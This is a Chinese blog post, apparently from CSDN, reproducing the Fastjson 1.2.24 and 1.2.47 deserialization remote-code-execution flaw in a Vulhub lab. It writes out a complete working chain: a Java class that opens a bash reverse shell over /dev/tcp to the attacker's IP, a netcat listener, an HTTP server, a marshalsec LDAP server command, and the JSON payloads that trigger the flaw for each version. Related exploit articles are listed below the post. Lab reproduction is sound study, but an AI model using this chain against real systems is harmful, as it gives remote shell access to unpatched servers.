Vulfocus-fastjson复现

最新推荐文章于 2024-03-10 17:06:04 发布
最新推荐文章于 2024-03-10 17:06:04 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: Vulfocus 文章标签: java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45130489/article/details/127332610
版权
Fastjson版本:1.2.24和1.2.47

准备环境:Vulhub
靶机地址:192.168.30.129(kali)
攻击机:192.168.1.43(win10)

开始

启动环境:

docker-compose up -d

查看正在运行中的容器:

docker ps

启动成功后,访问网址:192.168.30.129:8090
下载工具:marshalsec(https://github.com/mbechler/marshalsec)
它的用法:需要 Java 8环境,然后使用 maven将文件夹marshalsec打成可用的jar包。
所以也需要maven环境。
安装好maven后在命令行输入mvn -v,显示maven的版本说明安装成功。
在marshalsec目录下进入命令行,输入命令:

mvn clean package -DskipTests

打包成功时页面会出现BIULD SUCCESS!

现在在攻击机(win10)上开启监听:

ncat -lvvp 6666

编译文件test.java

// bash -i >& /dev/tcp/192.168.1.43/6666 0>&1    这里的ip是攻击机的IP,以及监听的端口6666
import java.lang.Runtime;
import java.lang.Process;

public class test {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.1.43/6666 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

编译test.java,输入命令:

javac test.java

(记得把中文注释去掉,不然会报错)

得到test.class

然后用攻击机搭建临时的http服务,这里用的是python2

python -m SimpleHTTPServer 8445

在浏览器访问http://192.168.1.43:8445,页面会显示攻击机的文件树
在这里插入图片描述
现在在攻击机启动LDAP服务,监听1389端口,并加载刚刚编译好的test.class

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.1.43:8445/#test" 1389

在这里插入图片描述
最后向靶机(192.168.30.129)发送构造好的poc数据
记得将GET改成POST
// 1.2.24版本poc
{
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“ldap://192.168.1.43:1389/test”,
“autoCommit”:true
}
}
在这里插入图片描述
成功反弹shell
在这里插入图片描述

//1.2.47版本POC
{
“a”:{
“@type”:“java.lang.Class”,
“val”:“com.sun.rowset.JdbcRowSetImpl”
},
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“ldap://192.168.1.43:1389/test”,
“autoCommit”:true
}
}
在这里插入图片描述
同样反弹成功
希望这篇文章对你有所帮助。

Lucky-Tian
关注
专栏目录
fastjson 1.2.47漏洞复现实战(vulfocus在线靶场CNVD-2017-02833)——关注紫灵小姐姐不踩坑】
weixin_40416851的博客
08-28 1018
fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。...............
漏洞复现-fastjson1.2.24-RCE
jazzz98的博客
06-27 420
(4)安装完成好后,新建一个java脚本,命名为TouchFile.java,这个文件的作用大致就是使用java创建一个文件,如下为其所有代码,本意为在靶场的tmp目录下创建一个名为。还有一个比较重要的问题就是,攻击思路为:使用Ubuntu的java加载一个调用恶意文件的环境,再使用该环境远程加载一个恶意类,达到借刀进行命令执行的效果。(3)由于我的环境已经安装好恶意调用java的RMI服务,因此这里仅提供以下编译环境的命令,编译成功会出现绿色的"
Vulfocus漏洞复现fastjson-cnvd_2017_02833、fastjson-cnvd_2019_22238
weixin_45632448的博客
04-12 4586
vps:centos8 腾讯云 本地:windows11 靶场环境:http://123.58.236.76:24477/ 访问靶场环境:http://123.58.236.76:24477/ burp进行抓包,将请求方式改为POST,能够请求json数据,可能存在fastjson漏洞 准备两个东西:Exploit.class、marshalsec-0.0.3-SNAPSHOT-all.jar(准备过程不详述,网上都有) 在本地创建Exploit.java,内容如下 import java.io.Buf
vulfocus fastjson打靶
qq_18811919的博客
01-10 346
vulfocus/fastjson-cnvd_2017_02833:latest打靶
[Vulfocus解题系列]fastjson1.2.24反序列化RCE (CVE-2017-18349)
00勇士王子的博客
03-22 5778
前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson1.2.24版本爆出了第一个反序列化漏洞。第一个Fastjson反序列化漏洞爆出后,阿里在1.2.25版本设置了autoTypeSupport属性默认为false,并且增加了checkAutoType()函数,通过黑白名单的方式来防御Fastjson反序列化漏洞
vulfocus/fastjson-cnvd_2019_22238漏洞复现(docker)附问题解决方案
最新发布
weixin_63139305的博客
03-10 1954
完整的复现过程,每一步的原理都很详细。使用vulhub的docker,没有使用在线的vulfocus因为连接太不稳定了
gexin-rp-fastjson-1.0.0.1.jar
06-13
un push相关推送jar包文件,找了很久才找到,保存下,有需要的欢迎下载
converter-fastjson-android-2.1.0.jar
02-08
converter-fastjson-android-2.1.0.jar
retrofit-converter-fastjson,改造变频器fastjson.zip
10-13
转换器FastJSON
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6409
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
Java安全-Java Vuls(Fastjson、Weblogic漏洞复现
Love&Share
05-05 980
复现几个 Java 的漏洞,文章会分多篇这是第一篇,文章会分组件和中间件两个角度进行漏洞复现 复现使用环境 Vulhub VulFocus 文章目录组件Fastjson 1.2.24 反序列化 RCEFastjson 1.2.47 反序列化 RCE中间件Weblogic 文件读取&war包上传(Vulhub)Weblogic 任意文件上传 CVE-2018-2894Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883) 组件 Fastj.
Vulhub复现fastjson漏洞
人若有志,就不会在半坡停止。
11-08 1053
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为Java对象,Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
fastjson 漏洞复现
温和的跳跃
07-09 317
可能从fastjson“盘古开天地”开始讲,因为我对序列化 反序列化还有那些组件非常不熟悉(谁不搞开发会对这些熟悉)也算复习一下java知识吧,之前好像我自己大二学习java序列化那章就搜索过序列化漏洞,没办法 我读书时候只对这种东西感兴趣,对一般知识没有兴趣。 我先自己学习一会去。 漏洞复现主要是vulhub/fastjson/1.2.24-rce ...
vulhub漏洞复现Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 3940
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
Fastjson漏洞复现
Bird&Bird
09-28 3100
目录概述漏洞环境漏洞复现编写恶意类编译并开启RMI服务 概述 fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 漏洞环境 靶场选择使用vulhub搭建,网址:https://github.com/vulhub/vulhub 下载vulhub,找到fastjson/1.2.24-rce目录,使用docker-compose up -d启动环境。 docker ps -a 查看
【Web】vulhub Fastjson反序列化漏洞复现学习笔记
uuzeray的博客
02-07 628
复现流程vulhub启动靶场用marshalsec启动LDAP/RMI服务用python启动HTTP服务,存放恶意字节码(LinuxTouch.class)效果是在靶机临时目录下创建一个success文件发现python启动的http服务接收到字节码请求再看靶机容器的/tmp下,成功创建success文件。
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-12 3万+
本文是Fastjson1.2.24漏洞复现,包括漏洞原理、漏洞利用(远程创建文件)、漏洞利用(反弹shell)。使用vulhub靶场进行搭建,保姆级教程,还望大家多多支持。
fastjson <= 1.2.80 反序列化任意代码执行漏洞
qq_18209847的博客
05-24 4499
fastjson <= 1.2.80 反序列化任意代码执行漏洞
Fastjson v1.2.80 Throwable AutoType 机制绕过漏洞分析
include_voidmain的博客
05-26 3607
声明 以下内容,来自且听安全公众号的QCyber作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。 0x01 漏洞信息 近期Fastjson Develop Team报告了Fastjson v1.2.80存在AutoType绕过反序列化漏洞,通报如下: 漏洞在特定条件下可以绕过默认关闭的AutoType限制,结合一个新的利用链,可实现RCE 。 0x02 AuthType 机制 Fastjson通过函数`parse`
vulfocus fastjson
09-04
- *3* [Vulfocus-fastjson复现](https://blog.csdn.net/weixin_45130489/article/details/127332610)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值